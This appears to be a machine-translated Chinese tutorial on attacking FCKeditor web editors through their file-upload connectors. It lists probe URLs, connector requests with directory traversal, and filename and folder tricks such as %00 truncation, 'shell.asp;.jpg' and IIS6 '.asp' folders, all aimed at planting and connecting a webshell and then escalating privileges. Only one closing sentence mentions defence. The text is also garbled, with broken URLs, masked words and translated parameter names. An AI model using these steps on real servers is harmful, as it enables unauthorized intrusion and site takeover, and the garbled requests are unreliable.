一、关于FCKeditor
FCKeditor是一个网页文本编辑器,在很多内容管理系统中都有使用。
简要介绍了通过FCKeditor上传漏洞的思路,并对可能的操作进行了梳理。
二。攻击思想
1.检查FCKeditor版本
http://127 . 0 . 0 . 1/fckeditor/editor/dialog/fck _ about . html
http://127 . 0 . 0 . 1/FCKeditor/_ whats new . html
2.测试上传点
FCKeditor/editor/file ***nager/browser/default/connectors/test . html
FCKeditor/editor/file ***nager/upload/test . html
FCKeditor/editor/file ***nager/connectors/test . html
FCKeditor/editor/file ***nager/connectors/upload test . html
FCKeditor/_ samples/default . html
FCKeditor/_ samples/ASP/sample 01 . ASP
FCKeditor/_ samples/ASP/sample 02 . ASP
FCKeditor/_ samples/ASP/sample 03 . ASP
FCKeditor/_ samples/ASP/sample 04 . ASP
FCKeditor/_ samples/default . html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fck dialog . html
FCKeditor/editor/file ***nager/browser/default/connectors/ASP/connector . ASP?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
FCKeditor/editor/file ***nager/browser/default/connectors/PHP/connector . PHP?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
FCKeditor/editor/file ***nager/browser/default/connectors/aspx/connector . aspx?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
FCKeditor/editor/file ***nager/browser/default/connectors/JSP/connector . JSP?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
FCKeditor/editor/file ***nager/browser/default/browser . html?
Type = I***ge & ampconnector = http://*** . site . com/fckeditor/editor/file ***nager/connectors/PHP/conne
ctor.php
FCKeditor/editor/file ***nager/browser/default/browser . html?
Type = I***ge & ampconnector = http://*** . site . com/fckeditor/editor/file ***nager/connectors/ASP/conne
ctor.asp
FCKeditor/editor/file ***nager/browser/default/browser . html?
Type = I***ge & ampconnector = http://*** . site . com/fckeditor/editor/file ***nager/connectors/aspx/conn
ector.aspx
FCKeditor/editor/file ***nager/browser/default/browser . html?
Type = I***ge & ampconnector = http://*** . site . com/fckeditor/editor/file ***nager/connectors/JSP/conne
ctor.jsp
FCKeditor/editor/file ***nager/browser/default/browser . html?
type = I***ge & amp连接器=连接器/asp/connector.asp
FCKeditor/editor/file ***nager/browser/default/browser . html?
Type = I***ge & amp连接器=连接器/jsp/连接器. JSP
fckeditor/editor/file ***nager/browser/default/browser . html?
Type = I***ge & amp连接器=连接器/aspx/连接器。文件
fckeditor/editor/file ***nager/browser/default/browser . html?Type = I***ge & amp欺骗
3.突破限制
3.1上传限制
突破上传限制的方法有很多,主要是抓包改扩展名,在%00截断,添加文件头。
3.2文件名限制
3.2.1第二个上传旁路文件名“.”已更改为“_”
shell.asp等FCK已上传文件;。jpg文件,文件名会自动改为shell _ asp。jpg .您可以继续上传相同的名称。
文件,文件名将变成shell.asp;(1).使用jpeg文件交换格式存储的编码图像文件扩展名
3.2.2提交shell.php+空以绕过
空 grid只支持windows系统,linux系统不支持。可以提交shell.php+空 grid绕过文件名限制。
3.3 IIS6.0突破了文件夹限制
fckeditor/editor/file ***nager/connectors/ASP/connector . ASP?
命令=创建文件夹& amp类型=文件& ampCurrentFolder=/shell.asp。NewFolderName=z.asp
FCKeditor/editor/file ***nager/connectors/ASP/connector . ASP?
命令=创建文件夹& ampType = I***ge & ampCurrentFolder=/shell.asp。NewFolderName = z & ampuuid=124478997568
四
FCKeditor/editor/file ***nager/browser/default/connectors/ASP/connector . ASP?
命令=创建文件夹& amp当前文件夹=/&Type = I***ge & ampNewFolderName=shell.asp
3.4文件解析限制
通过Fckeditor编辑器在文件上传页面创建一个1.asp之类的文件夹,然后在文件夹下上传一张图片。
Webs文件,获取它的webshell。
http://127 . 0 . 0 . 1/i***ges/upload/201806/i***ge/1 . ASP/1 . jpg
4.列目录
4.1 FCKeditor/editor/FCKeditor . html
fck editor/editor/fck editor . html您无法上载文件。可以点击上传图片按钮,然后选择浏览服务器跳转。
转到可上传文件页面查看已上传的文件。
4.2根据xml返回的信息检查网站目录
http://127 . 0 . 0 . 1/fckeditor/editor/file ***nager/browser/default/connectors/aspx/connector . as
px?命令=创建文件夹& ampType = I***ge & amp当前文件夹=../../../&NewFolderName=shell.asp
4.3获取当前文件夹
FCKeditor/editor/file ***nager/browser/default/connectors/aspx/connector . aspx?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
FCKeditor/editor/file ***nager/browser/default/connectors/PHP/connector . PHP?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
FCKeditor/editor/file ***nager/browser/default/connectors/ASP/connector . ASP?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=/
4.4浏览E-drive文件
/FCKeditor/editor/file ***nager/browser/default/connectors/aspx/connector . aspx?
命令= GetFoldersAndFiles & ampType = I***ge & ampCurrentFolder=e:/
5.连接特洛伊木马
可以解析木马后,使用各种工具连接木马,获取webshell。此时,文件由FCKeditor上传。
并且攻击过程已经完成。
三。其他人
获得webshell后,可以进行的操作很多,也很容易提权。获得主机权限并不难。
至于这个漏洞的防御,可以删除所有上传点,限制目录访问。
本文来自无言温柔天然对象投稿,不代表舒华文档立场,如若转载,请注明出处:https://www.chinashuhua.cn/24/604935.html
微信扫一扫 
